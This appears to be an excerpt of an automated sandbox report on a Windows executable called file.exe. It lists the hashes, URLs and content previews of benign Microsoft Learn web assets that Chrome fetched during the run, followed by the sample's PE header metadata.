                                                                                                                                                                                                Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):18477
                                                                                                                                                                                                Entropy (8bit):5.147347768532056
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                                MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                                SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                                SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                                SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):15427
                                                                                                                                                                                                Entropy (8bit):7.784472070227724
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                Entropy (8bit):4.241202481433726
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):52717
                                                                                                                                                                                                Entropy (8bit):5.462668685745912
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1432
                                                                                                                                                                                                Entropy (8bit):4.986131881931089
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                                Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):52717
                                                                                                                                                                                                Entropy (8bit):5.462668685745912
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1173007
                                                                                                                                                                                                Entropy (8bit):5.503893944397598
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                Entropy (8bit):3.875
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:HMB:k
                                                                                                                                                                                                MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):33370
                                                                                                                                                                                                Entropy (8bit):7.973675198531228
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):13339
                                                                                                                                                                                                Entropy (8bit):7.683569563478597
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):1817143
                                                                                                                                                                                                Entropy (8bit):5.501007973622959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                                Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Entropy (8bit):7.949317854505955
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                File size:1'858'560 bytes
                                                                                                                                                                                                MD5:c295093aa18965205a72349f476a9cf3
                                                                                                                                                                                                SHA1:a6be2adb5b6cec99d08774cc16f97a0958e725fd
                                                                                                                                                                                                SHA256:e17a1dea3206e9cd29badca66347857b796122e12ed6017f0889bf8e196dcfd8
                                                                                                                                                                                                SHA512:697136ddf3e73f24ab10931481de27972679996d98ad73dc5376637696e40febed34f9ceda624725b5da58e4f65f435f49df2198b64c5502cd7cd0e1b16d02fd
                                                                                                                                                                                                SSDEEP:24576:mDxCYkN3+dWzAhVYmVVorw7LGBHAStgfg5pN0Dl6g7nFH1ZsTRQLrE0hYOb/0P0S:j5N3YtTGGSG4C4g7bZ4mLrf0MFV6j
                                                                                                                                                                                                TLSH:6B8533A6EF151930CDEE02384B92C3D9179C0585B9A255E3674F3311FDB9D2B9FBA220
                                                                                                                                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g..............................I...........@...........................J......:....@.................................\p..p..
                                                                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                                                                Entrypoint:0x89e000
                                                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                jmp 00007FBF315A716Ah
                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5705c0x70.idata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x571f80x8.idata
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
